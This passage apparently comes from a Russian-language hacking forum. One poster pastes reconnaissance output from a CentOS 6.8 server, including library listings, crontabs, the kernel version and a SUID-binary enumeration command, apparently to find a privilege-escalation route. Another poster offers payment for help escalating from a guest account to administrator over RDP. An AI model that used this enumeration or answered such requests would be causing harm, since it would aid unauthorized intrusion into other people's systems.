    lrwxrwxrwx  1 root root  36 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64
    -rwxr-xr-x  1 root root  28064 2015-07-24 05:10:22.000000000 +0300 libip6tc.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  32 2015-09-24 13:44:32.109000000 +0300 libipq.so.0 -> /etc/alternatives/libipq0.x86_64
    lrwxrwxrwx  1 root root  21 2015-09-24 13:40:38.570000000 +0300 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  34 2015-09-24 13:44:32.109000000 +0300 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64
    -rwxr-xr-x  1 root root  9280 2015-07-24 05:10:22.000000000 +0300 libipq.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  33 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64
    lrwxrwxrwx  1 root root  22 2015-09-24 13:40:38.571000000 +0300 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  35 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64
    -rwxr-xr-x  1 root root  3680 2015-07-24 05:10:21.000000000 +0300 libiptc.so.0.0.0-1.4.7
    lrwxrwxrwx  1 root root  18 2016-08-31 16:19:35.625898397 +0300 libk5crypto.so.3 -> libk5crypto.so.3.1
    -rwxr-xr-x  1 root root  174840 2016-05-11 01:56:56.000000000 +0300 libk5crypto.so.3.1
    lrwxrwxrwx  1 root root  18 2014-12-01 11:49:42.935000000 +0300 libkeyutils.so.1 -> libkeyutils.so.1.3
    -rwxr-xr-x  1 root root  10192 2014-10-15 15:08:05.000000000 +0400 libkeyutils.so.1.3
    lrwxrwxrwx  1 root root  14 2016-08-31 16:19:35.643898095 +0300 libkrb5.so.3 -> libkrb5.so.3.3
    -rwxr-xr-x  1 root root  946048 2016-05-11 01:56:56.000000000 +0300 libkrb5.so.3.3
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:35.721896783 +0300 libkrb5support.so.0 -> libkrb5support.so.0.1
    -rwxr-xr-x  1 root root  43728 2016-05-11 01:56:56.000000000 +0300 libkrb5support.so.0.1
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:40.845810635 +0300 liblber-2.4.so.2 -> liblber-2.4.so.2.10.3
    -rwxr-xr-x  1 root root  60512 2016-05-11 02:32:56.000000000 +0300 liblber-2.4.so.2.10.3
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:40.849810568 +0300 libldap-2.4.so.2 -> libldap-2.4.so.2.10.3
    -rwxr-xr-x  1 root root  330864 2016-05-11 02:32:56.000000000 +0300 libldap-2.4.so.2.10.3
    lrwxrwxrwx  1 root root  23 2016-08-31 16:19:40.868810249 +0300 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.10.3
    -rwxr-xr-x  1 root root  356048 2016-05-11 02:32:56.000000000 +0300 libldap_r-2.4.so.2.10.3
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:40.881810030 +0300 libldif-2.4.so.2 -> libldif-2.4.so.2.10.3
    -rwxr-xr-x  1 root root  5960 2016-05-11 02:32:56.000000000 +0300 libldif-2.4.so.2.10.3
    -rwxr-xr-x  1 root root  596360 2016-05-10 17:11:21.000000000 +0300 libm-2.12.so
    lrwxrwxrwx  1 root root  12 2016-08-31 16:19:31.137973862 +0300 libm.so.6 -> libm-2.12.so
    lrwxrwxrwx  1 root root  17 2017-01-20 13:26:14.748974241 +0300 libmount.so.1 -> libmount.so.1.1.0
    -rwxr-xr-x  1 root root  65856 2016-11-18 18:38:31.000000000 +0300 libmount.so.1.1.0
    lrwxrwxrwx  1 root root  17 2015-09-24 13:39:11.291000000 +0300 libncurses.so.5 -> libncurses.so.5.7
    -rwxr-xr-x  1 root root  139784 2015-03-16 11:54:00.000000000 +0300 libncurses.so.5.7
    lrwxrwxrwx  1 root root  18 2015-09-24 13:39:11.302000000 +0300 libncursesw.so.5 -> libncursesw.so.5.7
    -rwxr-xr-x  1 root root  189368 2015-03-16 11:54:00.000000000 +0300 libncursesw.so.5.7
    lrwxrwxrwx.  1 root root  20 2012-09-28 12:27:33.000000000 +0400 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0
    -rwxr-xr-x.  1 root root  39896 2011-12-07 21:40:52.000000000 +0400 libnih-dbus.so.1.0.0
    lrwxrwxrwx.  1 root root  15 2012-09-28 12:27:33.000000000 +0400 libnih.so.1 -> libnih.so.1.0.0
    -rwxr-xr-x.  1 root root  101920 2011-12-07 21:40:52.000000000 +0400 libnih.so.1.0.0
    lrwxrwxrwx  1 root root  14 2014-06-17 13:10:48.000000000 +0400 libnl.so.1 -> libnl.so.1.1.4
    -rwxr-xr-x  1 root root  337248 2013-11-22 15:27:57.000000000 +0400 libnl.so.1.1.4
    -rwxr-xr-x  1 root root  113432 2016-05-10 17:11:21.000000000 +0300 libnsl-2.12.so
    lrwxrwxrwx  1 root root  14 2016-08-31 16:19:31.144973744 +0300 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x  1 root root  244624 2016-05-11 10:14:23.000000000 +0300 libnspr4.so
    -rwxr-xr-x  1 root root  42808 2016-05-10 17:11:21.000000000 +0300 libnss_compat-2.12.so
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:31.146973710 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x  1 root root  27424 2016-05-10 17:11:21.000000000 +0300 libnss_dns-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:19:31.149973660 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x  1 root root  65960 2016-05-10 17:11:20.000000000 +0300 libnss_files-2.12.so
    lrwxrwxrwx  1 root root  20 2016-08-31 16:19:31.152973609 +0300 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x  1 root root  24152 2016-05-10 17:11:19.000000000 +0300 libnss_hesiod-2.12.so
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:31.154973575 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x  1 root root  52560 2016-05-10 17:11:20.000000000 +0300 libnss_nis-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:19:31.157973526 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so
    -rwxr-xr-x  1 root root  61712 2016-05-10 17:11:19.000000000 +0300 libnss_nisplus-2.12.so
    lrwxrwxrwx  1 root root  22 2016-08-31 16:19:31.160973475 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    lrwxrwxrwx  1 root root  16 2016-08-31 16:19:38.547849269 +0300 libpam.so.0 -> libpam.so.0.82.2
    -rwxr-xr-x  1 root root  55848 2016-05-11 02:18:24.000000000 +0300 libpam.so.0.82.2
    lrwxrwxrwx  1 root root  21 2016-08-31 16:19:38.550849219 +0300 libpam_misc.so.0 -> libpam_misc.so.0.82.0
    -rwxr-xr-x  1 root root  14584 2016-05-11 02:18:24.000000000 +0300 libpam_misc.so.0.82.0
    lrwxrwxrwx  1 root root  17 2016-08-31 16:19:38.551849202 +0300 libpamc.so.0 -> libpamc.so.0.82.1
    -rwxr-xr-x  1 root root  14528 2016-05-11 02:18:24.000000000 +0300 libpamc.so.0.82.1
    lrwxrwxrwx  1 root root  16 2014-12-01 11:49:42.902000000 +0300 libpci.so.3 -> libpci.so.3.1.10
    -rwxr-xr-x  1 root root  48992 2014-08-05 15:06:35.000000000 +0400 libpci.so.3.1.10
    lrwxrwxrwx  1 root root  16 2015-09-24 13:39:21.021000000 +0300 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  183080 2015-07-24 01:46:06.000000000 +0300 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  18720 2016-05-11 10:14:23.000000000 +0300 libplc4.so
    -rwxr-xr-x  1 root root  14560 2016-05-11 10:14:23.000000000 +0300 libplds4.so
    lrwxrwxrwx  1 root root  27 2014-12-01 11:49:46.318000000 +0300 libply-splash-core.so.2 -> libply-splash-core.so.2.0.0
    -rwxr-xr-x  1 root root  70360 2014-08-11 21:59:59.000000000 +0400 libply-splash-core.so.2.0.0
    lrwxrwxrwx  1 root root  15 2014-12-01 11:49:46.324000000 +0300 libply.so.2 -> libply.so.2.0.0
    -rwxr-xr-x  1 root root  89776 2014-08-11 21:59:59.000000000 +0400 libply.so.2.0.0
    lrwxrwxrwx.  1 root root  16 2012-09-28 12:27:28.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
    -rwxr-xr-x.  1 root root  36360 2010-08-21 09:30:58.000000000 +0400 libpopt.so.0.0.0
    -rwxr-xr-x  1 root root  63200 2016-05-11 02:23:09.000000000 +0300 libproc-3.2.8.so
    -rwxr-xr-x  1 root root  142688 2016-05-10 17:11:21.000000000 +0300 libpthread-2.12.so
    lrwxrwxrwx  1 root root  18 2016-08-31 16:19:31.168973340 +0300 libpthread.so.0 -> libpthread-2.12.so
    lrwxrwxrwx.  1 root root  18 2012-09-28 12:27:30.000000000 +0400 libreadline.so.6 -> libreadline.so.6.0
    -rwxr-xr-x.  1 root root  269592 2012-06-22 10:54:32.000000000 +0400 libreadline.so.6.0
    -rwxr-xr-x  1 root root  110960 2016-05-10 17:11:20.000000000 +0300 libresolv-2.12.so
    lrwxrwxrwx  1 root root  17 2016-08-31 16:19:31.174973240 +0300 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x  1 root root  43944 2016-05-10 17:11:20.000000000 +0300 librt-2.12.so
    lrwxrwxrwx  1 root root  13 2016-08-31 16:19:31.177973189 +0300 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x  1 root root  122056 2016-05-11 01:59:51.000000000 +0300 libselinux.so.1
    -rwxr-xr-x  1 root root  201952 2015-07-24 04:38:39.000000000 +0300 libsemanage.so.1
    -rwxr-xr-x.  1 root root  248680 2011-12-07 22:01:08.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root  12 2015-09-24 13:40:25.790000000 +0300 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root  27120 2015-07-24 13:33:24.000000000 +0300 libss.so.2.0
    -rwxr-xr-x  1 root root  34008 2016-05-10 17:11:21.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root  19 2016-08-31 16:19:31.179973155 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root  15 2015-09-24 13:39:11.316000000 +0300 libtinfo.so.5 -> libtinfo.so.5.7
    -rwxr-xr-x  1 root root  132408 2015-03-16 11:54:00.000000000 +0300 libtinfo.so.5.7
    lrwxrwxrwx  1 root root  16 2016-09-14 15:20:18.893921298 +0300 libudev.so.0 -> libudev.so.0.5.1
    -rwxr-xr-x  1 root root  55184 2016-09-06 17:51:59.000000000 +0300 libudev.so.0.5.1
    -rwxr-xr-x  1 root root  14584 2016-05-10 17:11:19.000000000 +0300 libutil-2.12.so
    lrwxrwxrwx  1 root root  15 2016-08-31 16:19:31.181973122 +0300 libutil.so.1 -> libutil-2.12.so
    lrwxrwxrwx  1 root root  16 2017-01-20 13:26:13.933986532 +0300 libuuid.so.1 -> libuuid.so.1.3.0
    -rwxr-xr-x  1 root root  16304 2016-11-18 18:38:31.000000000 +0300 libuuid.so.1.3.0
    lrwxrwxrwx  1 root root  16 2016-08-31 16:19:36.694880424 +0300 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root  40792 2016-05-11 02:02:55.000000000 +0300 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root  36 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64
    lrwxrwxrwx  1 root root  25 2015-09-24 13:40:38.572000000 +0300 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7
    lrwxrwxrwx  1 root root  38 2015-09-24 13:44:32.109000000 +0300 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64
    -rwxr-xr-x  1 root root  32208 2015-07-24 05:10:22.000000000 +0300 libxtables.so.4.0.0-1.4.7
    lrwxrwxrwx  1 root root  13 2014-04-09 11:15:32.000000000 +0400 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root  88600 2013-02-22 03:02:16.000000000 +0400 libz.so.1.2.3
    drwxr-xr-x.  2 root root  4096 2015-06-09 15:16:03.062000000 +0300 rsyslog
    drwxr-xr-x.  2 root root  4096 2016-08-31 16:19:31.184973071 +0300 rtkaio
    drwxr-xr-x.  3 root root  4096 2016-08-31 16:19:39.936825917 +0300 security
    dr-xr-xr-x.  2 root root  4096 2011-09-23 15:50:20.000000000 +0400 tls
    drwxr-xr-x.  2 root root  4096 2015-09-24 13:41:59.052000000 +0300 xtables
    • mount
    Code:
    /dev/vda1 on / type ext4 (rw,noatime,usrquota,grpquota)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    • df -h
    Code:
    Filesystem  Size  Used Avail Use% Mounted on
    /dev/vda1  40G  16G  22G  43% /
    tmpfs  2.0G  0  2.0G  0% /dev/shm
    
    • cat /etc/issue
    Code:
    CentOS release 6.8 (Final)
    Kernel \r on an \m
    
    • cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
    Code:
    cat /etc/crontab 2>&1
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    
    cron.d:
    total 24
    drwxr-xr-x  2 root root 4096 Jan 14 23:47 .
    drwxr-xr-x. 90 root root 4096 Apr 25 12:15 ..
    -rw-r--r--  1 root root  113 Aug 23  2016 0hourly
    -rw-------  1 root root  235 May 11  2016 sysstat
    -rw-r--r--  1 root root  51 Jan 14 23:47 trim
    -rw-r--r--  1 root root  187 Feb  9  2015 unbound-anchor
    
    
    cat 0hourly sysstat trim unbound-anchor
    
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    01 * * * * root run-parts /etc/cron.hourly
    cat: sysstat: Permission denied
    12 0 * * * root /usr/sbin/fstrim / > /dev/null 2>&1# Look to see if the DNSSEC Root key got rolled, if so check trust and update
    
    10 3 1 * * unbound /usr/sbin/unbound-anchor -a /var/lib/unbound/root.anchor -c /etc/unbound/icannbundle.pem
    
    cron.hourly:
    total 12
    drwxr-xr-x  2 root root 4096 Aug 31  2016 .
    drwxr-xr-x. 90 root root 4096 Apr 25 12:15 ..
    -rwxr-xr-x  1 root root  409 Aug 23  2016 0anacron
    
    cat 0anacron
    #!/bin/bash
    # Skip excecution unless the date has changed from the previous run
    if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
    fi
    if [ `date +%Y%m%d` = "$day" ]; then
    exit 0;
    fi
    
    # Skip excecution unless AC powered
    if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power &> /dev/null
    if test $? -eq 1; then
    exit 0
    fi
    fi
    /usr/sbin/anacron -s
    
    • cat /proc/version
    Code:
    Linux version 3.10.63-1.el6.elrepo.x86_64 (mockbuild@Build64R6) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Dec 16 16:52:21 EST 2014
    • cat /proc/sys/vm/mmap_min_addr
    Code:
    4096
    • find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -rwsr-xr-x 1 root root 38264 May 10  2016 /bin/ping
    -rwsr-xr-x 1 root root 53472 Nov 18  2016 /bin/umount
    -rwsr-xr-x 1 root root 77336 Nov 18  2016 /bin/mount
    -rwsr-xr-x 1 root root 36488 May 10  2016 /bin/ping6
    -rwsr-xr-x 1 root root 34904 May 11  2016 /bin/su
    -rwsr-x--- 1 root dbus 46232 Apr 22  2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 22544 Mar 17  2015 /usr/bin/pkexec
    -rws--x--x 1 root root 20056 Nov 18  2016 /usr/bin/chsh
    ---s--x--x 1 root root 123832 Dec  7  2016 /usr/bin/sudo
    -rwsr-xr-x 1 root root 70480 May 11  2016 /usr/bin/chage
    -rws--x--x 1 root root 20184 Nov 18  2016 /usr/bin/chfn
    -rwsr-xr-x 1 root root 51784 Aug 23  2016 /usr/bin/crontab
    -rwsr-xr-x 1 root root 30768 Nov 23  2015 /usr/bin/passwd
    -rwsr-xr-x 1 root root 75640 May 11  2016 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 40240 May 11  2016 /usr/bin/newgrp
    -rws--x--x 1 root root 14280 May 10  2016 /usr/libexec/pt_chown
    -rws--x--x 1 vcsa root 7352 May 11  2016 /usr/libexec/mc/cons.saver
    -rwsr-xr-x 1 root root 14368 Mar 17  2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 257824 May 12  2016 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 9000 Jul 12  2016 /usr/sbin/usernetctl
    -r-s--x--- 1 root apache 13984 Jan 12 20:10 /usr/sbin/suexec
    -rwsr-xr-x 1 root root 1228104 Jun  9  2016 /usr/sbin/exim
    -rwsr-xr-x 1 root root 34840 May 11  2016 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 10272 May 11  2016 /sbin/pam_timestamp_check
    
    Остольное Permission denied
    
     
  19. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Vip77 likes this.
  20. Traffim

    Traffim New Member

    Joined:
    2 Apr 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Помогите (за вознаграждение) получить по RDP права администратора (или повысить привилегии). Имеется доступ к учетной записи гостя.

    [​IMG]

    [​IMG]

    https://i.snag.gy/g8OybK.jpg

    https://i.snag.gy/H8mCXA.jpg
     
Loading...